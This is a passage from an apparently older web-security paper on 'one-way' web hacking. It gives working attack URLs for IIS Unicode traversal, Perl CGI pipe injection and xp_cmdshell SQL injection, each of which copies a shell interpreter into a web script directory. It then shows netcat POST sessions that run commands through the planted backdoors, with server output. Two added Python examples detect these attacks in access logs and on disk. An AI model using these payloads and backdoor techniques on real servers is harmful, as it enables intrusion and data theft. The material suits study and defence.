2.0 Flowchart for a one-way web hack
   Consider the example where an attacker finds a vulnerable web application, and is able to exploit it using techniques such as the ones mentioned previously. The attacker has achieved arbitrary command execution, but due to the restrictive firewall, is unable to proceed further into the network. To make an attack effective, two things are essential: 
- Interactive terminal access - for running commands to pilfer the attacked server or penetrate further into the network. 
- File transfer access - for transferring attack tools such as port scanners, rootkits, etc. 
A tight firewall can make it very difficult to achieve the above objectives, however, it is not impossible. To get around these restrictions, with a little bit of web application programming knowledge, we can create a web based command prompt and a file uploader. 
Before proceeding further we shall take a preview of the various stages of the one-way hack, as illustrated by the following diagram: 

[Diagram: stages of the one-way hack (not reproduced in this text)]
3.0 Finding the entry point
  The one-way hack begins when we are able to achieve remote command execution on the target web server. We can use any of the common techniques used to attack web servers. We shall present a few examples of various ways of achieving remote command execution based on different types of URL mappings as described previously. A detailed discussion on web server and application vulnerabilities is beyond the scope of this paper. 
Our objective is to create a backdoor by moving the shell interpreter (/bin/sh, cmd.exe, etc) to an area within the web server's document root. This way, we can invoke the shell interpreter through a URL. We present three examples which illustrate how to create backdoors using various exploitation techniques. 
The diagram below illustrates some of the techniques used to find an entry point: 

[Diagram: techniques for finding an entry point (not reproduced in this text)]
3.0.1 Exploiting URL parsing
  The Unicode / Double decode attack is a classic example of a URL parsing vulnerability. The URL below copies the command interpreter - cmd.exe - into the "scripts/" directory within the web server's document root: 
http://www1.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+
    c:\winnt\system32\cmd.exe+c:\inetpub\scripts
    
3.0.2 Exploiting poorly validated input parameters
  In this example, an unchecked parameter is passed from the URL to a Perl CGI script, news.cgi, which hands it to the open() call without validation. Because a two-argument open() in Perl treats a value ending in a pipe character as a command to run rather than a file to read, the parameter value becomes a shell command: 
http://www2.example.com/cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+
    /usr/local/apache/cgi-bin/sh.cgi|
   The shell (/bin/sh) gets copied into the cgi-bin directory as sh.cgi.  
  
3.0.3 Exploiting SQL injection
  Here, we show how SQL injection can be used to invoke a stored procedure (xp_cmdshell) on the database server, and run operating system commands through it: 
http://www3.example.com/product.asp?id=5%01EXEC+master..xp_cmdshell+
   'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\'
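The three entry points above leave distinct traces in the web server's access log. The following Python script is an added example, not code from the paper, that scans Common Log Format lines for them: the overlong-UTF-8 and double-encoded separator sequences behind the Unicode and double-decode attacks, shell metacharacters in a CGI parameter, and a query string that reaches xp_cmdshell. The log lines are constructed for the example and are not real server output; the tag names, regular expressions and helper functions are the example's own.

```python
"""Scan access-log lines for the three entry-point patterns described above.
Added example: the log lines, tags and helpers are constructed, not taken
from the paper."""
import re
from urllib.parse import unquote_to_bytes, unquote_plus

# Constructed sample log lines in Common Log Format (not real server output).
SAMPLE_LOG = r"""
10.0.0.5 - - [08/Dec/1999:06:13:19 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts HTTP/1.0" 200 512
10.0.0.6 - - [27/Nov/2003:20:47:20 +0000] "GET /cgi-bin/news.cgi?story=101003.txt|cp+/bin/sh+/usr/local/apache/cgi-bin/sh.cgi| HTTP/1.0" 200 0
10.0.0.7 - - [27/Nov/2003:20:48:01 +0000] "GET /product.asp?id=5%01EXEC+master..xp_cmdshell+'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\' HTTP/1.0" 200 1024
10.0.0.8 - - [27/Nov/2003:20:49:33 +0000] "GET /cgi-bin/news.cgi?story=101003.txt HTTP/1.0" 200 2048
10.0.0.9 - - [27/Nov/2003:20:50:10 +0000] "POST /scripts/cmd.exe HTTP/1.0" 200 1301
"""

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
                 r'(?P<status>\d{3}) (?P<size>\S+)$')

# Raw sequences the Unicode (%c0%af = overlong '/', %c1%9c = overlong '\')
# and double-decode (%252f, %255c) attacks rely on. A correct UTF-8 decoder
# rejects the overlong forms, so they are matched before any decoding.
ENCODED_SEPARATOR = re.compile(r'%c0%af|%c1%9c|%25(?:2f|5c)', re.I)
TRAVERSAL = re.compile(rb'\.\.[\\/]')          # "../" or "..\" after decoding
SHELL_META = re.compile(r'[|;`]|\$\(')         # pipe, separator, command substitution
XP_CMDSHELL = re.compile(r'xp_cmdshell', re.I)
CMD_EXE = re.compile(r'/cmd\.exe$', re.I)      # cmd.exe never belongs under the docroot


def decode_path(path: str) -> bytes:
    """Percent-decode twice (mirroring a double-decoding server) without
    assuming UTF-8, so that unusual byte sequences survive for inspection."""
    once = unquote_to_bytes(path)
    return unquote_to_bytes(once.decode('latin-1'))


def classify(method: str, target: str) -> list:
    """Return the sorted list of tags that apply to one request line."""
    path, _, query = target.partition('?')
    tags = set()
    if ENCODED_SEPARATOR.search(path) or TRAVERSAL.search(decode_path(path)):
        tags.add('url-parsing-traversal')
    if query:
        q = unquote_plus(query)                 # undo %xx and '+' before matching
        if SHELL_META.search(q):
            tags.add('shell-metachar-in-param')
        if XP_CMDSHELL.search(q):
            tags.add('sql-injection-xp_cmdshell')
    if CMD_EXE.search(path):
        tags.add('cmd.exe-requested')
    return sorted(tags)


def scan_log(text: str) -> list:
    """Return (line_number, client_ip, tags) for every flagged request."""
    hits = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        m = CLF.match(line)
        if not m:
            continue                            # malformed line: skip, do not crash
        tags = classify(m['method'], m['target'])
        if tags:
            hits.append((n, m['ip'], tags))
    return hits


if __name__ == '__main__':
    for n, ip, tags in scan_log(SAMPLE_LOG):
        print(f'line {n} from {ip}: {", ".join(tags)}')
```

Matching after decoding matters: the pipe in the news.cgi example and the xp_cmdshell keyword only appear once the %xx escapes and the plus signs are undone, while the %c0%af sequence is best matched in its raw form, since a strict decoder would never turn it into a slash. The plain POST to /scripts/cmd.exe on the last sample line is flagged by path alone; the commands it carries are in the request body, which the access log does not record.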
    
3.1 Invoking the command interpreter
  The point of copying the command interpreter or the shell into the web document root is to be able to invoke it remotely over HTTP. The HTTP POST method is best suited for this purpose: with POST, the request body is passed to the invoked resource on its standard input, and whatever the resource writes to standard output is returned by the web server over the same HTTP connection. 
We shall illustrate how to send commands to command interpreters over POST, with two examples - one for CMD.EXE on IIS and Windows NT and the other for sh.cgi (which is a copy of /bin/sh) on Apache and Linux. 
  
3.1.1 POSTing commands to CMD.EXE
  The example below shows two commands being run with CMD.EXE, which is accessible on http://www1.example.com/scripts/cmd.exe. The lines from "POST /scripts/cmd.exe HTTP/1.0" through "exit" make up the POST request; the lines from "HTTP/1.1 200 OK" onward are the server's response. 
$ nc www1.example.com 80
POST /scripts/cmd.exe HTTP/1.0
Host: www1.example.com
Content-length: 17
ver
dir c:\
exit
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:13:19 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\scripts>ver
Windows NT Version 4.0
C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A
Directory of c:\
10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a                  certs
11/28/00  05:12p                  software
12/06/00  03:46p                  src
12/07/00  12:50p                  weblogic
12/07/00  12:53p                  weblogic_publish
12/07/99  01:11p                  JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a                  urlscan
12/07/99  04:55a                  Netscape
           13 File(s)    134,217,728 bytes
                         120,782,848 bytes free
C:\Inetpub\scripts>exit
$
  Some care needs to be taken in order for CMD.EXE to receive the commands properly, and for the web server to return the output of CMD.EXE properly. In the above example, we have included the "exit" command to ensure that the input stream to CMD.EXE terminates properly. The Content-length of the POST request is also calculated accordingly, keeping in mind the extra characters taken by "exit". 
  
3.1.2 POSTing commands to /bin/sh
  The example below shows three commands being run with /bin/sh, which is accessible on http://www2.example.com/cgi-bin/sh.cgi. The lines from "POST /cgi-bin/sh.cgi HTTP/1.0" through "exit" make up the POST request; the lines from "HTTP/1.1 200 OK" onward are the server's response. 
$ nc www2.example.com 80
POST /cgi-bin/sh.cgi HTTP/1.0
Host: www2.example.com
Content-type: text/html
Content-length: 60
echo 'Content-type: text/html'
echo
uname
id
ls -la /
exit
HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:47:20 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html
Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x   19 root     root         4096 Feb  2  2002 .
drwxr-xr-x   19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x    2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x    2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x    6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x   29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x    8 root     root         4096 Dec  1  2001 home
drwxr-xr-x    4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x    2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x    4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x    3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x   37 root     root            0 Nov 28  2003 proc
drwxr-x---    9 root     root         4096 Feb  9  2003 root
drwxr-xr-x    3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x    2 root     root         4096 Feb  2  2002 src
drwxrwxrwt    7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x    4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x   21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x   16 root     root         4096 Jun 19  2001 var
$
  The care and feeding of /bin/sh over Apache is slightly different. Apache expects a well formed HTTP response header from all its CGI programs, hence we have to prepend the line "Content-type: text/html", followed by a blank line, to the output. The two "echo" commands are for this purpose. 
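All three entry points end the same way: a copy of the system's shell interpreter sitting inside a web-exposed script directory, reachable by POST. Because a POST body is not written to the access log, the backdoor is easier to find on disk than in the log. The following Python check is an added example, not code from the paper: it hashes every file under the given script directories and reports those whose content is identical to a known interpreter, so a renamed copy such as sh.cgi, or a symlink to /bin/sh, is caught regardless of its name. The directory layout built by demo() is constructed in a temporary directory; DEFAULT_INTERPRETERS, DEFAULT_SCRIPT_DIRS and the function names are the example's own.

```python
"""Find copies of system shell interpreters inside web-exposed script
directories by comparing file content hashes. Added example; the scenario
in demo() is constructed, not taken from the paper."""
import hashlib
import os
import shutil
import tempfile

# Interpreters that never belong under a document root (example defaults;
# extend for the platform being checked).
DEFAULT_INTERPRETERS = ['/bin/sh', '/bin/bash',
                        r'C:\Windows\System32\cmd.exe',
                        r'C:\WINNT\system32\cmd.exe']
# Typical web-exposed executable directories (example defaults).
DEFAULT_SCRIPT_DIRS = ['/usr/local/apache/cgi-bin', r'C:\Inetpub\scripts']


def sha256_of(path: str) -> str:
    """Hash a file in chunks so large binaries do not load into memory at once."""
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(1 << 16), b''):
            h.update(chunk)
    return h.hexdigest()


def find_interpreter_copies(script_dirs, interpreters) -> list:
    """Return sorted (found_path, matched_interpreter) pairs for every file
    under script_dirs whose content equals one of the interpreters."""
    known = {}
    for interp in interpreters:
        if os.path.isfile(interp):
            known[sha256_of(interp)] = interp
    hits = []
    for d in script_dirs:
        for root, _dirs, files in os.walk(d):
            for name in files:
                p = os.path.join(root, name)
                try:
                    digest = sha256_of(p)       # follows symlinks, so a link is caught too
                except OSError:
                    continue                    # unreadable file: skip, report elsewhere
                if digest in known:
                    hits.append((p, known[digest]))
    return sorted(hits)


def demo() -> list:
    """Constructed scenario: a stand-in 'interpreter' in a fake bin/, a
    legitimate CGI script, and a copy of the interpreter dropped into the
    fake cgi-bin/ under the name sh.cgi. Returns the base names flagged."""
    base = tempfile.mkdtemp()
    try:
        sysbin = os.path.join(base, 'bin')
        cgibin = os.path.join(base, 'cgi-bin')
        os.makedirs(sysbin)
        os.makedirs(cgibin)
        interp = os.path.join(sysbin, 'sh')
        with open(interp, 'wb') as f:
            f.write(b'#!fake-interpreter\n' * 100)
        with open(os.path.join(cgibin, 'news.cgi'), 'wb') as f:
            f.write(b'#!/usr/bin/perl\nprint "ok\\n";\n')
        shutil.copy(interp, os.path.join(cgibin, 'sh.cgi'))
        hits = find_interpreter_copies([cgibin], [interp])
        return [os.path.basename(p) for p, _ in hits]
    finally:
        shutil.rmtree(base)


if __name__ == '__main__':
    print('demo flagged:', demo())
    for found, interp in find_interpreter_copies(DEFAULT_SCRIPT_DIRS,
                                                 DEFAULT_INTERPRETERS):
        print(f'{found} is a copy of {interp}')
```

Run periodically, or as part of file integrity monitoring, this complements the access-log check: the log shows a POST to an executable in a script directory, and the hash comparison shows whether that executable is an interpreter that was copied in.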
  
3.1.3 Automating the POST process
   We have created two Perl scripts post_cmd.pl and post_sh.pl to automate the task of preparing the proper POST requests for the commands and sending them to the web server. The syntax for invoking post_cmd.pl is as follows: 
usage: post_cmd.pl url [proxy:port] <>  
post_cmd.pl is written such that it can tunnel the POST requests over an HTTP proxy server as well. post_sh.pl is on similar lines. 
 The examples below show the same results being derived using the Perl scripts instead of forming our own POST requests:  
  
Output of post_cmd.pl
  $ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe
ver
dir c:\
^D
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 08 Dec 1999 06:05:46 GMT
Content-Type: application/octet-stream
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\scripts>ver
Windows NT Version 4.0
C:\Inetpub\scripts>dir c:\
Volume in drive C has no label.
Volume Serial Number is E43A-2A0A
Directory of c:\
10/04/00  05:28a                  WINNT
10/04/00  05:31a                  Program Files
10/04/00  05:37a                  TEMP
10/04/00  07:01a                  Inetpub
10/04/00  07:01a                  certs
11/28/00  05:12p                  software
12/06/00  03:46p                  src
12/07/00  12:50p                  weblogic
12/07/00  12:53p                  weblogic_publish
12/07/99  01:11p                  JavaWebServer2.0
12/07/99  06:49p           134,217,728 pagefile.sys
12/07/99  07:24a                  urlscan
12/07/99  04:55a                  Netscape
           13 File(s)    134,217,728 bytes
                         120,782,848 bytes free
C:\Inetpub\scripts>exit
$
    
Output of post_sh.pl
  $ ./post_sh.pl http://www2.example.com/cgi-bin/sh.cgi
uname
id
ls -la /
^D
HTTP/1.1 200 OK
Date: Thu, 27 Nov 2003 20:43:54 GMT
Server: Apache/1.3.12
Connection: close
Content-Type: text/html
Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody)
total 116
drwxr-xr-x   19 root     root         4096 Feb  2  2002 .
drwxr-xr-x   19 root     root         4096 Feb  2  2002 ..
drwxr-xr-x    2 root     root         4096 Jun 20  2001 bin
drwxr-xr-x    2 root     root         4096 Nov 28 02:01 boot
drwxr-xr-x    6 root     root        36864 Nov 28 02:01 dev
drwxr-xr-x   29 root     root         4096 Nov 28 02:01 etc
drwxr-xr-x    8 root     root         4096 Dec  1  2001 home
drwxr-xr-x    4 root     root         4096 Jun 19  2001 lib
drwxr-xr-x    2 root     root        16384 Jun 19  2001 lost+found
drwxr-xr-x    4 root     root         4096 Jun 19  2001 mnt
drwxr-xr-x    3 root     root         4096 Feb  2  2002 opt
dr-xr-xr-x   37 root     root            0 Nov 28  2003 proc
drwxr-x---    9 root     root         4096 Feb  9  2003 root
drwxr-xr-x    3 root     root         4096 Jun 20  2001 sbin
drwxrwxr-x    2 root     root         4096 Feb  2  2002 src
drwxrwxrwt    7 root     root         4096 Nov 28 02:01 tmp
drwxr-xr-x    4 root     root         4096 Feb  2  2002 u01
drwxr-xr-x   21 root     root         4096 Feb  2  2002 usr
drwxr-xr-x   16 root     root         4096 Jun 19  2001 var
$
  In this manner, we can issue multiple commands to the target web server using HTTP POST requests. This concept shall be used to create arbitrary files on the web server, as discussed in section 4.1. 